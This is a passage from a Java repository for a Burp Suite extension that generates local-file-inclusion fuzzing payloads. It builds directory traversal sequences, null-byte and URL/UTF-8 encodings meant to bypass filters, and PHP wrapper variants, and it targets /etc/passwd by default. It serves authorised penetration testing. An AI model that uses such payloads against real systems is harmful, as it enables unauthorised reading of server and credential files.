├── .gitignore
├── .idea
├── compiler.xml
├── dictionaries
│ └── root.xml
├── encodings.xml
├── misc.xml
├── uiDesigner.xml
├── vcs.xml
└── workspace.xml
├── LfiBurp.iml
├── README.md
├── pom.xml
├── src
├── main
│ └── java
│ │ ├── LfiFuzzer
│ │ ├── PayloadConfigException.java
│ │ ├── PayloadGenerator.java
│ │ ├── PayloadGeneratorConfig.java
│ │ ├── TreeStructure.java
│ │ ├── UserInterface.java
│ │ └── payloadTypes
│ │ │ ├── ExtraCharsPayloads.java
│ │ │ ├── NullBytePayloads.java
│ │ │ ├── PayloadFactory.java
│ │ │ ├── PayloadNotFoundException.java
│ │ │ ├── PayloadType.java
│ │ │ ├── TransversalPayloads.java
│ │ │ └── WrapperPayloads.java
│ │ └── burp
│ │ ├── BurpExtender.java
│ │ ├── IBurpCollaboratorClientContext.java
│ │ ├── IBurpCollaboratorInteraction.java
│ │ ├── IBurpExtender.java
│ │ ├── IBurpExtenderCallbacks.java
│ │ ├── IContextMenuFactory.java
│ │ ├── IContextMenuInvocation.java
│ │ ├── ICookie.java
│ │ ├── IExtensionHelpers.java
│ │ ├── IExtensionStateListener.java
│ │ ├── IHttpListener.java
│ │ ├── IHttpRequestResponse.java
│ │ ├── IHttpRequestResponsePersisted.java
│ │ ├── IHttpRequestResponseWithMarkers.java
│ │ ├── IHttpService.java
│ │ ├── IInterceptedProxyMessage.java
│ │ ├── IIntruderAttack.java
│ │ ├── IIntruderPayloadGenerator.java
│ │ ├── IIntruderPayloadGeneratorFactory.java
│ │ ├── IIntruderPayloadProcessor.java
│ │ ├── IMenuItemHandler.java
│ │ ├── IMessageEditor.java
│ │ ├── IMessageEditorController.java
│ │ ├── IMessageEditorTab.java
│ │ ├── IMessageEditorTabFactory.java
│ │ ├── IParameter.java
│ │ ├── IProxyListener.java
│ │ ├── IRequestInfo.java
│ │ ├── IResponseInfo.java
│ │ ├── IResponseKeywords.java
│ │ ├── IResponseVariations.java
│ │ ├── IScanIssue.java
│ │ ├── IScanQueueItem.java
│ │ ├── IScannerCheck.java
│ │ ├── IScannerInsertionPoint.java
│ │ ├── IScannerInsertionPointProvider.java
│ │ ├── IScannerListener.java
│ │ ├── IScopeChangeListener.java
│ │ ├── ISessionHandlingAction.java
│ │ ├── ITab.java
│ │ ├── ITempFile.java
│ │ └── ITextEditor.java
└── test
│ └── java
│ └── LfiFuzzer
│ ├── PayloadGeneratorConfigTest.java
│ ├── TreeStructureTest.java
│ └── payloadTypes
│ ├── ExtraCharsPayloadsTest.java
│ ├── NullBytePayloadsTest.java
│ ├── PayloadFactoryTest.java
│ ├── TransversalPayloadsTest.java
│ └── WrapperPayloadsTest.java
└── target
├── .gitignore
├── LfiBurp-1.0.jar
├── classes
├── LfiFuzzer
│ ├── PayloadConfigException.class
│ ├── PayloadGenerator.class
│ ├── PayloadGeneratorConfig.class
│ ├── UserInterface.class
│ └── payloadTypes
│ │ ├── ExtraCharsPayloads.class
│ │ ├── NullBytePayloads.class
│ │ ├── PayloadFactory.class
│ │ ├── PayloadNotFoundException.class
│ │ ├── PayloadType.class
│ │ └── TransversalPayloads.class
└── burp
│ ├── BurpExtender$IntruderPayloadGenerator.class
│ ├── BurpExtender.class
│ ├── IBurpCollaboratorClientContext.class
│ ├── IBurpCollaboratorInteraction.class
│ ├── IBurpExtender.class
│ ├── IBurpExtenderCallbacks.class
│ ├── IContextMenuFactory.class
│ ├── IContextMenuInvocation.class
│ ├── ICookie.class
│ ├── IExtensionHelpers.class
│ ├── IExtensionStateListener.class
│ ├── IHttpListener.class
│ ├── IHttpRequestResponse.class
│ ├── IHttpRequestResponsePersisted.class
│ ├── IHttpRequestResponseWithMarkers.class
│ ├── IHttpService.class
│ ├── IInterceptedProxyMessage.class
│ ├── IIntruderAttack.class
│ ├── IIntruderPayloadGenerator.class
│ ├── IIntruderPayloadGeneratorFactory.class
│ ├── IIntruderPayloadProcessor.class
│ ├── IMenuItemHandler.class
│ ├── IMessageEditor.class
│ ├── IMessageEditorController.class
│ ├── IMessageEditorTab.class
│ ├── IMessageEditorTabFactory.class
│ ├── IParameter.class
│ ├── IProxyListener.class
│ ├── IRequestInfo.class
│ ├── IResponseInfo.class
│ ├── IResponseKeywords.class
│ ├── IResponseVariations.class
│ ├── IScanIssue.class
│ ├── IScanQueueItem.class
│ ├── IScannerCheck.class
│ ├── IScannerInsertionPoint.class
│ ├── IScannerInsertionPointProvider.class
│ ├── IScannerListener.class
│ ├── IScopeChangeListener.class
│ ├── ISessionHandlingAction.class
│ ├── ITab.class
│ ├── ITempFile.class
│ └── ITextEditor.class
├── maven-status
└── maven-compiler-plugin
│ ├── compile
│ └── default-compile
│ │ ├── createdFiles.lst
│ │ └── inputFiles.lst
│ └── testCompile
│ └── default-testCompile
│ └── inputFiles.lst
└── test-classes
└── LfiFuzzer
├── PayloadGeneratorConfigTest.class
├── TreeStructureTest.class
└── payloadTypes
├── ExtraCharsPayloadsTest.class
├── NullBytePayloadsTest.class
├── PayloadFactoryTest.class
├── TransversalPayloadsTest.class
└── WrapperPayloadsTest.class
/.gitignore:
--------------------------------------------------------------------------------
1 | target/archive-tmp/
2 | target/classes/
3 | target/generated-sources/
4 | target/LfiBurp-1.0.jar/
5 | target/LfiBurp-1.0-jar-with-dependencies.jar
6 | target/maven-archiver/
7 | target/maven-status/
8 | .idea/
9 |
--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/.idea/dictionaries/root.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | nullbyte
5 | passwd
6 | phar
7 | transversal
8 | transversals
9 |
10 |
11 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/LfiBurp.iml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # LFI-Fuzzer-Burp-Suite
2 | LFI-Fuzzer is a plugin for [Burp-Suite](https://portswigger.net/), this plugin can be used with the community edition to generate payloads for targets that could be vulnerable to local file inclusion attacks.
3 |
4 |
5 | 
6 |
7 |
8 | 
9 |
10 | ## Getting Started
11 |
12 | Go to Extender->Extensions and click in the Add button. Next select Java as the extension type and load in LfiBurp-1.0-jar-with-dependencies.jar
13 |
14 | ### Installing From Source
15 |
16 | Make sure that you have maven installed and java. Then run the following to package the java. Note you will need an internet connection for the maven runtime dependencies.
17 |
18 | ```
19 | git clone https://github.com/luke-goddard/LFI-Fuzzer-Burp-Suite
20 | cd LFI-Fuzzer-Burp-Suite
21 | mvn compile package
22 | file target/LfiBurp-1.0-jar-with-dependencies.jar
23 | ```
24 |
25 | ### Tested With
26 |
27 | I have built the plugin using openjdk version "1.8.0_212".
28 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | luke.goddard
8 | LfiBurp
9 | 1.0
10 | jar
11 |
12 |
13 |
14 | net.portswigger.burp.extender
15 | burp-extender-api
16 | LATEST
17 |
18 |
19 | org.junit.jupiter
20 | junit-jupiter-api
21 | 5.5.1
22 | test
23 |
24 |
25 | junit
26 | junit
27 | 4.12
28 | test
29 |
30 |
31 |
32 |
33 |
34 |
35 | maven-assembly-plugin
36 |
37 |
38 |
39 | jar-with-dependencies
40 |
41 |
42 |
43 |
44 | true
45 |
46 |
47 |
48 |
49 |
50 | make-assembly
51 | package
52 |
53 | single
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 | UTF-8
62 | 1.8
63 | 1.8
64 |
65 |
66 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/PayloadConfigException.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | public class PayloadConfigException extends RuntimeException {
4 | PayloadConfigException(String errorMessage) {
5 | super(errorMessage);
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/PayloadGenerator.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | import LfiFuzzer.payloadTypes.PayloadFactory;
4 | import LfiFuzzer.payloadTypes.PayloadNotFoundException;
5 | import LfiFuzzer.payloadTypes.PayloadType;
6 | import burp.IExtensionHelpers;
7 |
8 | import java.io.PrintWriter;
9 | import java.nio.charset.StandardCharsets;
10 | import java.util.Arrays;
11 | import java.util.HashSet;
12 | import java.util.Set;
13 |
14 | import static LfiFuzzer.TreeStructure.getTree;
15 |
16 | /**
17 | * This class uses the configuration generated by the user interface to
18 | * tailor the payloads that are generated.
19 | */
20 | public class PayloadGenerator {
21 | private PayloadGeneratorConfig config;
22 | private Set payloads = getTree();
23 | private PrintWriter stdout;
24 | private PrintWriter stderr;
25 | private IExtensionHelpers helpers;
26 |
27 |
28 | public PayloadGenerator(PayloadGeneratorConfig config, PrintWriter stdout, PrintWriter stderr, IExtensionHelpers helpers){
29 | this.config = config;
30 | this.stdout = stdout;
31 | this.stderr = stderr;
32 | this.helpers = helpers;
33 | }
34 |
35 | public Set generatePayloads(){
36 | showPayloadSettings();
37 | stdout.println("Generating Payloads");
38 |
39 | payloads.addAll(generateFilePayloads());
40 | payloads.addAll(generateTranPayloads());
41 | payloads.addAll(generateSwapSlash());
42 | payloads.addAll(generateExtraSlashes());
43 | payloads.addAll(generateExtraDots());
44 | payloads.addAll(generateNullbyteSuffix());
45 | payloads.addAll(generateSingleUrlEncode());
46 | payloads.addAll(generateDoubleUrlEncode());
47 | payloads.addAll(generateUtf8Encode());
48 | payloads.addAll(generateWrappers());
49 |
50 | stdout.println("Finished Generating Payloads");
51 | return payloads;
52 | }
53 |
54 | private Set generateFilePayloads(){
55 | stdout.println("Generating Standard File Payloads");
56 | Set filePayloads = new HashSet<>();
57 | for (String fileToInclude : config.filesToInclude) filePayloads.add(fileToInclude.getBytes());
58 | return filePayloads;
59 | }
60 |
61 | private Set generateTranPayloads() throws PayloadNotFoundException {
62 | stdout.println("Generating Directory Transversal:");
63 | try {
64 | PayloadType tranGen = PayloadFactory.getPayloadType("Transversal", payloads, config);
65 | tranGen.setStd(stdout, stderr);
66 | return tranGen.generatePayload();
67 |
68 | }catch (PayloadNotFoundException e){
69 | stderr.println(e.toString());
70 | return new HashSet<>();
71 | }
72 | }
73 |
74 | private Set generateSwapSlash(){
75 | Set filePayloads = new HashSet<>();
76 |
77 | stdout.println("Generating Slash Swap:");
78 | if(config.forwardSlash) filePayloads.addAll(swapSlashes("Forward"));
79 | if(config.forwardSlash) filePayloads.addAll(swapSlashes("Backward"));
80 | return filePayloads;
81 | }
82 |
83 | private Set generateExtraSlashes() throws PayloadNotFoundException{
84 | stdout.println("Generating Extra Slash For Filter Sanitization Bypass:");
85 | try{
86 | PayloadType extraSlashGen = PayloadFactory.getPayloadType("Extra Slashes", payloads, config);
87 | extraSlashGen.setStd(stdout, stderr);
88 |
89 | Set newPayloads = extraSlashGen.generatePayload();
90 | stdout.println("Generated " + newPayloads.size()+ " new payloads");
91 | return newPayloads;
92 |
93 | }catch (PayloadNotFoundException e){
94 | stderr.println(e.toString());
95 | return new HashSet<>();
96 | }
97 | }
98 |
99 | private Set generateExtraDots() throws PayloadNotFoundException{
100 | stdout.println("Generating Extra Dots For Filter Sanitization Bypass:");
101 | try{
102 | PayloadType extraDotGen = PayloadFactory.getPayloadType("Extra Dots", payloads, config);
103 | extraDotGen.setStd(stdout, stderr);
104 |
105 | Set newPayloads = extraDotGen.generatePayload();
106 | stdout.println("Generated " + newPayloads.size()+ " new payloads");
107 | return newPayloads;
108 |
109 | }catch (PayloadNotFoundException e){
110 | stderr.println(e.toString());
111 | return new HashSet<>();
112 | }
113 | }
114 |
115 | private Set generateNullbyteSuffix(){
116 | stdout.println("Generating NullBytes For Filter Sanitization Bypass:");
117 | try{
118 | PayloadType nullByteSuffix = PayloadFactory.getPayloadType("Nullbytes", payloads, config);
119 | nullByteSuffix.setStd(stdout, stderr);
120 | Set newPayloads = nullByteSuffix.generatePayload();
121 |
122 | if(config.nullByteYes && !config.nullByteNo) payloads.clear();
123 | stdout.println("Generated " + newPayloads.size()+ " new payloads");
124 | return nullByteSuffix.generatePayload();
125 |
126 | }catch (PayloadNotFoundException e){
127 | stderr.println(e.toString());
128 | return new HashSet<>();
129 | }
130 | }
131 |
132 | private Set generateSingleUrlEncode(){
133 | Set newPayloads = new HashSet<>();
134 | int i = 0;
135 |
136 | if(!config.urlEncodeYes) return newPayloads;
137 |
138 | stdout.println("Single URL Encode Filter Sanitization Bypass:");
139 | for(byte[] oldPayload: payloads){
140 | i++;
141 | newPayloads.add(helpers.urlEncode(oldPayload));
142 | }
143 | if(config.urlEncodeYes && !config.urlEncodeNo) payloads.clear();
144 | stdout.println("Generated " + i + " new payloads");
145 | return newPayloads;
146 | }
147 |
148 | private Set generateDoubleUrlEncode(){
149 | Set newPayloads = new HashSet<>();
150 | int i = 0;
151 |
152 | if(!config.doubleUrlEncodeYes) return newPayloads;
153 | stdout.println("Double URL Encode Filter Sanitization Bypass:");
154 |
155 | for(byte[] oldPayload: payloads){
156 | i++;
157 | newPayloads.add(helpers.urlEncode(oldPayload));
158 | }
159 |
160 | if(config.doubleUrlEncodeYes && !config.doubleUrlEncodeNo) payloads.clear();
161 | stdout.println("Generated " + i + " new payloads");
162 | return newPayloads;
163 | }
164 |
165 | private Set generateUtf8Encode(){
166 | Set newPayloads = new HashSet<>();
167 |
168 | if(!config.urlEncodeYes) return newPayloads;
169 | stdout.println("UTF-8 Encode For Filter Sanitization Bypass:");
170 |
171 | for(byte[] oldPayload: payloads){
172 | newPayloads.add(new String(oldPayload, StandardCharsets.UTF_8).getBytes());
173 | }
174 |
175 | if(config.utf8EncodeYes && !config.utf8EncodeNo) payloads.clear();
176 | stdout.println("Generated " + newPayloads.size()+ " new payloads");
177 | return newPayloads;
178 | }
179 |
180 | private Set generateWrappers(){
181 | Set newPayloads = new HashSet<>();
182 | if(config.expectWrapper || config.filterWrapper || config.pharWrapper || config.zipWrapper){
183 | PayloadType wrapperGenerator = PayloadFactory.getPayloadType("Wrappers", payloads, config);
184 | newPayloads = wrapperGenerator.generatePayload();
185 | }
186 | return newPayloads;
187 | }
188 |
189 | private Set swapSlashes(String direction){
190 | Set newPayloads = new HashSet<>();
191 | byte[] newPayload;
192 | int i = 0;
193 | byte before;
194 | byte after;
195 |
196 | if(direction.equals("Forward")){
197 | before = PayloadType.getBytes("\\")[0];
198 | after = PayloadType.getBytes("/")[0];
199 | }
200 | else{
201 | after = PayloadType.getBytes("\\")[0];
202 | before = PayloadType.getBytes("/")[0];
203 | }
204 |
205 | for(byte[] oldPayload: payloads){
206 | newPayload = new byte[oldPayload.length];
207 | for(int x = 0 ; x <= oldPayload.length - 1; x++){
208 | i++;
209 | if(oldPayload[x] == before){
210 | newPayload[x] = after;
211 | continue;
212 | }
213 | newPayload[x] = oldPayload[x];
214 | }
215 | newPayloads.add(newPayload);
216 | }
217 | stdout.println("Generated " + i + " new payloads");
218 | return newPayloads;
219 | }
220 |
221 | private void showPayloadSettings(){
222 | int i = 0;
223 |
224 | stdout.println("Payload Settings");
225 | stdout.println("tranMin: " + config.tranMin);
226 | stdout.println("tranMax: " + config.tranMax);
227 | stdout.println("slashMin: " + config.slashMin);
228 | stdout.println("slashMax: " + config.slashMax);
229 | stdout.println("dotsMin: " + config.dotsMin);
230 | stdout.println("dotsMax: " + config.dotsMax);
231 | stdout.println("nullByteYes: " + config.nullByteYes);
232 | stdout.println("nullByteNo: " + config.nullByteNo);
233 | stdout.println("urlEncodeYes: " + config.urlEncodeYes);
234 | stdout.println("urlEncodeNo: " + config.urlEncodeNo);
235 | stdout.println("doubleUrlEncodeYes: " + config.doubleUrlEncodeYes);
236 | stdout.println("doubleUrlEncodeNo: " + config.doubleUrlEncodeNo);
237 | stdout.println("utf8EncodeYe: " + config.utf8EncodeYes);
238 | stdout.println("utf8EncodeNo: " + config.utf8EncodeNo);
239 | stdout.println("expectWrapper: " + config.expectWrapper);
240 | stdout.println("filterWrapper: " + config.filterWrapper);
241 | stdout.println("pharWrapper: " + config.pharWrapper);
242 | stdout.println("zipWrapper: " + config.zipWrapper);
243 | stdout.println("forwardSlash: " + config.forwardSlash);
244 | stdout.println("backwardsSlash: " + config.backwardsSlash);
245 |
246 | stdout.println("list of files to include:");
247 | for(String f : config.filesToInclude){
248 | i++;
249 | stdout.println("File " + i + ": " + f);
250 | stdout.println("File " + i + ": " + Arrays.toString(f.getBytes(StandardCharsets.US_ASCII)));
251 | }
252 | stdout.println("");
253 | }
254 | }
255 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/PayloadGeneratorConfig.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | import java.util.HashSet;
4 | import java.util.Set;
5 |
6 | /**
7 | * Class as a data structure to hold the form information that the user
8 | * entered.
9 | */
10 | public class PayloadGeneratorConfig {
11 | int fileCount = 1;
12 |
13 | public int tranMin = 1;
14 | public int tranMax = 10;
15 |
16 | public int slashMin = 1;
17 | public int slashMax = 3;
18 |
19 | public int dotsMin = 1;
20 | public int dotsMax = 3;
21 |
22 | public boolean nullByteYes = false;
23 | public boolean nullByteNo = true;
24 |
25 | public boolean urlEncodeYes = false;
26 | public boolean urlEncodeNo = true;
27 |
28 | public boolean doubleUrlEncodeYes = false;
29 | public boolean doubleUrlEncodeNo = true;
30 |
31 | public boolean utf8EncodeYes= false;
32 | public boolean utf8EncodeNo = true;
33 |
34 | public boolean expectWrapper = false;
35 | public boolean filterWrapper = false;
36 | public boolean pharWrapper = false;
37 | public boolean zipWrapper = false;
38 |
39 | public boolean forwardSlash = true;
40 | public boolean backwardsSlash = false;
41 |
42 | Set filesToInclude = new HashSet<>();
43 |
44 | public int getPayloadCardinality() throws PayloadConfigException {
45 | int cardinality = 1;
46 | int tranTot = tranMax - tranMin + 1;
47 | int slashesTot = slashMax - slashMin + 1;
48 | int dotsTot = dotsMax - dotsMin + 1;
49 | int nullBytesTot = convertNoOrYesOrBoth(nullByteNo, nullByteYes);
50 | int urlEncodeTot = convertNoOrYesOrBoth(doubleUrlEncodeNo, doubleUrlEncodeYes);
51 | int doubleURLEncodeTot = convertNoOrYesOrBoth(doubleUrlEncodeNo, doubleUrlEncodeYes);
52 | int utfEncodeTot = convertNoOrYesOrBoth(utf8EncodeNo, utf8EncodeYes);
53 | int slashDirectionTot = convertNoOrYesOrBoth(forwardSlash, backwardsSlash);
54 |
55 | if(!validateSettings())throw new PayloadConfigException("Invalid Configurations");
56 |
57 | cardinality *= fileCount;
58 | cardinality *= tranTot;
59 | cardinality *= slashesTot;
60 | cardinality *= dotsTot;
61 | cardinality *= nullBytesTot;
62 | cardinality *= urlEncodeTot;
63 | cardinality *= doubleURLEncodeTot;
64 | cardinality *= utfEncodeTot;
65 | cardinality *= slashDirectionTot;
66 | cardinality *= convertBooleanToInt(expectWrapper);
67 | cardinality *= convertBooleanToInt(filterWrapper);
68 | cardinality *= convertBooleanToInt(pharWrapper);
69 | cardinality *= convertBooleanToInt(zipWrapper);
70 |
71 | return cardinality;
72 | }
73 |
74 | private boolean validateSettings(){
75 | return testMinValues() && testPairs();
76 | }
77 |
78 | private boolean testMinValues(){
79 | return tranMin >= 0 && tranMax >= 0 && slashMax >= 0 && slashMin >= 0 && dotsMax >= 0 && dotsMin >= 0;
80 | }
81 |
82 | private boolean testPairs(){
83 | return dotsMax >= dotsMin && slashMax >= slashMin && tranMax >= tranMin;
84 | }
85 |
86 | private int convertNoOrYesOrBoth(boolean a, boolean b){
87 | if(a && b) return 2;
88 | return 1;
89 | }
90 |
91 | private int convertBooleanToInt(boolean b){
92 | if (b) return 2;
93 | return 1;
94 | }
95 | }
96 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/TreeStructure.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | import java.util.Set;
4 | import java.util.TreeSet;
5 |
6 | /**
7 | * For some reason Java's HashSet does not generate a hashcode for byte arrays
8 | * This means that the Set will contain duplicate elements, making it not
9 | * a set. We can get past this by creating a TreeSet, and creating our own
10 | * comparator.
11 | */
12 | public class TreeStructure {
13 |
14 | public static Set getTree() {
15 | return new TreeSet<>((left, right) -> {
16 | if (left == null || right == null) return 0;
17 | for (int i = 0, j = 0; i < left.length && j < right.length; i++, j++) {
18 | int a = (left[i] & 0xff);
19 | int b = (right[j] & 0xff);
20 | if (a != b) {
21 | return b - a;
22 | }
23 | }
24 | return right.length - left.length;
25 | });
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/src/main/java/LfiFuzzer/UserInterface.java:
--------------------------------------------------------------------------------
1 | package LfiFuzzer;
2 |
3 | import burp.IBurpExtenderCallbacks;
4 | import burp.ITab;
5 |
6 | import javax.swing.*;
7 | import java.awt.*;
8 | import java.text.NumberFormat;
9 | import java.util.Arrays;
10 | import java.util.HashSet;
11 | import java.util.Locale;
12 | import java.util.Set;
13 |
14 | import static java.nio.charset.StandardCharsets.US_ASCII;
15 |
16 | /**
17 | * User interface for the LFI Fuzzer tab
18 | * This user interface allows the user to configure the
19 | * payloads that will be generated.
20 | */
21 | public class UserInterface implements Runnable, ITab {
22 |
23 | private PayloadGeneratorConfig payloadGeneratorConfig = new PayloadGeneratorConfig();
24 | private GridBagConstraints gbc = new GridBagConstraints();
25 | private IBurpExtenderCallbacks callbacks;
26 |
27 | private JPanel frame;
28 | private JPanel tranversalPanel;
29 | private JPanel slashPanel;
30 | private JPanel dotPanel;
31 | private JPanel nullRadioPanel;
32 | private JPanel urlEncodeRadioPanel;
33 | private JPanel doubleUrlEncodeRadioPanel;
34 | private JPanel filterCheckBoxPanel;
35 | private JPanel utf8EncodeRadioPanel;
36 |
37 | private JLabel fileToIncludeLabel;
38 | private JLabel dirTransversalCountLabel;
39 | private JLabel nullByteInjectionLabel;
40 | private JLabel extraSlashesLabel;
41 | private JLabel extraDotsLabel;
42 | private JLabel urlEncodeLabel;
43 | private JLabel doubleUrlEncodeLabel;
44 | private JLabel utf8EncodeLabel;
45 | private JLabel WrapperLabel;
46 | private JLabel payloadCounterLabel;
47 | private JLabel slashLabel;
48 |
49 | private JTextField includeFileTF;
50 |
51 | private JSlider tranMinSlider;
52 | private JSlider tranMaxSlider;
53 | private JSlider slashMinSlider;
54 | private JSlider slashMaxSlider;
55 | private JSlider dotsMinSlider;
56 | private JSlider dotsMaxSlider;
57 |
58 | private JCheckBox filterWrapperCheckBox;
59 | private JCheckBox expectWrapperCheckBox;
60 | private JCheckBox pharWrapperCheckBox;
61 | private JCheckBox zipWrapperCheckBox;
62 |
63 | private JComboBox slashDirectionComboBox;
64 |
65 | private JButton generateBtn;
66 |
67 |
68 | public UserInterface(IBurpExtenderCallbacks callbacks){
69 | this.callbacks = callbacks;
70 | }
71 |
72 | @Override
73 | public void run() {
74 | frame = new JPanel();
75 | frame.setBorder(BorderFactory.createTitledBorder("LFI Payload Configurations."));
76 |
77 | gbc.gridwidth = 1;
78 | gbc.gridheight = 1;
79 |
80 | frame.setLayout(new GridBagLayout());
81 | createJComponents();
82 | addComponents();
83 |
84 | callbacks.customizeUiComponent(frame);
85 | callbacks.customizeUiComponent(dirTransversalCountLabel);
86 | callbacks.addSuiteTab(UserInterface.this);
87 | }
88 |
89 | //
90 | // implement ITab
91 | //
92 | @Override
93 | public String getTabCaption() {
94 | return "LFI Fuzzer";
95 | }
96 |
97 | @Override
98 | public Component getUiComponent() {
99 | return frame;
100 | }
101 |
102 | public PayloadGeneratorConfig getPayloadConfiguration() {
103 | return payloadGeneratorConfig;
104 | }
105 |
106 | private void createJComponents(){
107 | createComponentsFileToInclude();
108 | createComponentsTranversal();
109 | createComponentsSlash();
110 | createComponentsDot();
111 | createComponentsNullByte();
112 | createComponentsSingleUrl();
113 | createComponentsDoubleUrl();
114 | createComponentsUtf();
115 | createComponentsWrapper();
116 | createComponentsSlashDirection();
117 | createComponentsPayload();
118 | createComponentsGenerate();
119 | }
120 |
121 | private void createComponentsFileToInclude(){
122 | fileToIncludeLabel = new JLabel("Files To Include (Separated With Commas):");
123 | includeFileTF = new JTextField("/etc/passwd");
124 | includeFileTF.addActionListener(actionEvent -> updateConfig());
125 | }
126 |
127 | private void createComponentsTranversal(){
128 | tranversalPanel = new JPanel();
129 | dirTransversalCountLabel = new JLabel("Directories To Transverse (Min, Max):");
130 |
131 | tranMinSlider = new JSlider(JSlider.HORIZONTAL, 0, 30, 1);
132 | tranMaxSlider = new JSlider(JSlider.HORIZONTAL, 0, 30, 1);
133 |
134 | tranMinSlider.setMajorTickSpacing(10);
135 | tranMinSlider.setMinorTickSpacing(1);
136 | tranMinSlider.setPaintTicks(true);
137 | tranMinSlider.setPaintLabels(true);
138 | tranMinSlider.setValue(1);
139 |
140 | tranMaxSlider.setMajorTickSpacing(10);
141 | tranMaxSlider.setMinorTickSpacing(1);
142 | tranMaxSlider.setPaintTicks(true);
143 | tranMaxSlider.setPaintLabels(true);
144 | tranMaxSlider.setValue(10);
145 |
146 | tranMaxSlider.addChangeListener(changeEvent -> updateConfig());
147 | tranMinSlider.addChangeListener(changeEvent -> updateConfig());
148 |
149 | tranversalPanel.add(tranMinSlider);
150 | tranversalPanel.add(tranMaxSlider);
151 | }
152 |
153 | private void createComponentsSlash(){
154 | slashPanel = new JPanel();
155 | extraSlashesLabel = new JLabel("Number Of Slashes (Min, Max):");
156 |
157 | slashMinSlider = new JSlider(JSlider.HORIZONTAL, 0, 30, 1);
158 | slashMaxSlider = new JSlider(JSlider.HORIZONTAL, 0, 30, 1);
159 |
160 | slashMinSlider.setMajorTickSpacing(10);
161 | slashMinSlider.setMinorTickSpacing(1);
162 | slashMinSlider.setPaintTicks(true);
163 | slashMinSlider.setPaintLabels(true);
164 | slashMinSlider.setValue(1);
165 |
166 | slashMaxSlider.setMajorTickSpacing(10);
167 | slashMaxSlider.setMinorTickSpacing(1);
168 | slashMaxSlider.setPaintTicks(true);
169 | slashMaxSlider.setPaintLabels(true);
170 | slashMaxSlider.setValue(3);
171 |
172 | slashMinSlider.addChangeListener(changeEvent -> updateConfig());
173 | slashMaxSlider.addChangeListener(changeEvent -> updateConfig());
174 |
175 | slashPanel.add(slashMinSlider);
176 | slashPanel.add(slashMaxSlider);
177 | }
178 |
179 | private void createComponentsDot(){
180 | dotPanel = new JPanel();
181 | extraDotsLabel = new JLabel("Number Of Dots (Min, Max):");
182 |
183 | dotsMinSlider = new JSlider(JSlider.HORIZONTAL, 0, 30, 1);
184 | dotsMaxSlider = new JSlider(JSlider.HORIZONTAL, 0, 30, 1);
185 |
186 | dotsMinSlider.setMajorTickSpacing(10);
187 | dotsMinSlider.setMinorTickSpacing(1);
188 | dotsMinSlider.setPaintTicks(true);
189 | dotsMinSlider.setPaintLabels(true);
190 | dotsMinSlider.setValue(1);
191 |
192 | dotsMaxSlider.setMajorTickSpacing(10);
193 | dotsMaxSlider.setMinorTickSpacing(1);
194 | dotsMaxSlider.setPaintTicks(true);
195 | dotsMaxSlider.setPaintLabels(true);
196 | dotsMinSlider.setValue(3);
197 |
198 | dotsMinSlider.addChangeListener(changeEvent -> updateConfig());
199 | dotsMaxSlider.addChangeListener(changeEvent -> updateConfig());
200 |
201 | dotPanel.add(dotsMinSlider);
202 | dotPanel.add(dotsMaxSlider);
203 | }
204 |
205 | private void createComponentsNullByte(){
206 | nullRadioPanel = new JPanel();
207 | nullByteInjectionLabel = new JLabel("Null Byte:");
208 |
209 | JRadioButton nullByteRadioNo = new JRadioButton("No");
210 | JRadioButton nullByteRadioYes = new JRadioButton("Yes");
211 | JRadioButton nullByteRadioBoth = new JRadioButton("Try Both");
212 |
213 | ButtonGroup nullGroup = new ButtonGroup();
214 | nullByteRadioNo.setSelected(true);
215 |
216 | nullByteRadioNo.addActionListener(actionEvent -> {
217 | payloadGeneratorConfig.nullByteNo = true;
218 | payloadGeneratorConfig.nullByteYes= false;
219 | updatePayloadCardinality();
220 | });
221 |
222 | nullByteRadioYes.addActionListener(actionEvent -> {
223 | payloadGeneratorConfig.nullByteNo = false;
224 | payloadGeneratorConfig.nullByteYes = true;
225 | updatePayloadCardinality();
226 | });
227 |
